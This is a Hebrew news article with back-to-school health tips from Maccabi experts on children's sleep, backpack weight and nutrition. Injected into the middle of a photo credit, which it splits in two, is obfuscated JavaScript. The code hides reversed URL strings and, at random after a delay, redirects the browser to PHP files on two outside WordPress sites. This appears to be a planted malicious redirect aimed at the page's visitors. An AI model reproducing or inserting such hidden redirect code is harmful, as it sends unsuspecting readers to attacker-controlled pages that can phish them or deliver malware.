fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

בחזרה לספסל הלימודים

זמני השינה והרגלי האכילה השתנו, ועלינו ההורים מוטלת האחריות לחשב מסלול מחדש. לאחר שהות ממושכת בבית הילדים חוזרים לספסל הלימודים, אך האם הם מגיעים רעננים עם כוחות מחודשים? לקראת החזרה ללימודים המומחים של מכבי מציעים דרכי התמודדויות החל מ-שעת שינה נכונה, דרך משקל אידיאלי לתיק גב וגם למה חשוב לטעון את הגוף באנרגיה לאחר הצום של הלילה
גני הילדים, בתי הספר, חינוך מיוחד | צילום: shutterstock
גני הילדים, בתי הספר, חינוך מיוחד | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

מכירים את זה שחופשת הקיץ עומדת להסתיים, אך הרגלי החופש עדיין נמצאים? ככה זה כשבני הנוער התרגלו למעט בשינה, להירדם בשעות הקטנות של הלילה ולהקיץ בצהרי היום. בכדי למנוע עייפות ולהתחיל את השנה רעננים, פנינו לד"ר עופר בלומנפלד, מומחה לרפואת משפחה של מכבי, להתמודדות עם האתגר.

ד"ר עופר בלומנפלד, מומחה לרפאות משפחה | צילום: מכבי

"מומלץ שילדי בית הספר היסודי ישנו כעשר שעות שינה רציפה בלילה ועל כן אם מתעוררים להסעות ב-06:30 ילכו לישון עד לשעה 21:00. בהתאם מומלץ שבני הנוער הלומדים בחטיבות הביניים והתיכון ישנו בממוצע 9 שעות ועל כן ילכו לישון לא יאוחר מ22:00" לדבריו, כשבוע לפני החזרה ללימודים על ההורים לחזור לשגרה הכוללת הקפדה על שעות שינה מינימליות על פי גיל ועל שעת שינה. בנוסף, יש לשים דגש על צמצום זמן מסכים- משחקי מחשב, צפייה בטלוויזיה וטלפונים החכמים הבאים על חשבון פעילויות חברתיות בעולם האמיתי, על חשבון שעות שינה ומעודדים יושבנות –במקום אורח חיים פעיל.

לימור אילוז, פיזיותרפיסטית מכבי מחוז צפון | צילום: מכבי

כשהילדים יחזרו לפקוד את הכיתות מדי יום, הם גם יחזרו לשאת משקל רב בתיקי בית הספר שעלול להכביד על גבם. אז מה עושים? לימור אילוז, הפיזיותרפיסטית המחוזית של מכבי בצפון ממליצה כיצד לבחור את התיק המתאים וכיצד לסדר אותו כך שיתאים באופן מיטבי.

"הטיפ המרכזי והחשוב מכולם הוא להשקיע מאמץ ומחשבה בבחירת הילקוט. ישנה חשיבות רבה להתאמתו שכן באמצעותו ניתן למנוע עייפות, כאבים חזקים ונזקים מצטברים לגב". לדבריה, חשוב להקפיד כי משקל הילקוט לא יעלה על 15% ממשקל הילד הנושא אותו. על הילקוט להיות עשוי מחומרים חזקים אך קלי משקל. בכדי להקטין את העומס, בתא הגדול, הקרוב ביותר לגב, יש לשים את הספרים הכבדים. בתאים הקטנים והרחוקים יותר יש לשים את הפריטים הקלים והקטנים.

רותי מיכאליס גרינולד, דיאטנית קלינית של מכבי בצפון | צילום: מכבי

ומה לגבי התזונה? תקופת הקורונה הובילה את הילדים להימצא יותר בביתם ואיתה רכישה מוגזמת של חטיפים וממתקים לביתם, שהיא מציאת נחמה באוכל הלא בריא. איך נתגבר? רותי מיכאליס גרינולד, דיאטנית קלינית ומנהלת מכבי אקטיבי- המרכזים לטיפול בעודף משקל בילדים במחוז צפון, טוענת כי אוכל לא בריא אינו הפתרון לרגשות של תסכול, דאגה, אפילו פחד ממה יהיה. תפקידכם ההורים, להקשיב, להבין ולדבר גם על הרגשות שעולים ולא לפצות באוכל.

חשוב להקפיד על אכילה ביחד עם מגוון של ירקות וגם קצת פירות, על הכנת כריכים בריאים לבית ספר ולאכול כבר לפני היציאה מהבית, כדי לטעון את הגוף באנרגיה לאחר הצום של הלילה. לשתות רק מים והרבה. לשתף את הילדים בהכנת האוכל, במילוי הבקבוקים במים. חשוב שיהיו חלק מהעשייה למען בריאותם. תנו להם אחריות, ואל תוותרו. חפשו יחד איתם חוגי ספורט מהנים וגם צאו איתם לפארקים לפעילות משותפת. הכל יחד יתרום לחיזוק המערכת החיסונית שתגן עליכם לקראת החורף .

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות